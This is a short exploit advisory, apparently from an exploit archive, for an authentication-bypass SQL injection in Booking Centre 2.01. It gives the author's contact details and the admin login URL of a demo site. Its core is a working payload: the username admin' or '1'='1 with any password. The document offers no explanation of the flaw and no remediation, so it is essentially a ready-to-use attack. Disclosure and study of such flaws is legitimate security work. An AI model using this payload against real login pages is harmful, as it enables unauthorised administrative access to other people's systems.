Booking Centre version 2.01 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
d07ad5a831ddf67064f531fe85fb013bf5423a1acfd90c7455e6f956a1c014eb
Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
--------------------------------------------------------------
Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com
--------------------------------------------------------------
Exploit: http://demo.hotelsadmin.com/admin/index.php
Username == admin' or '1'='1
password == (whatever)
--------------------------------------------------------------
Greetz to Slappywag
--------------------------------------------------------------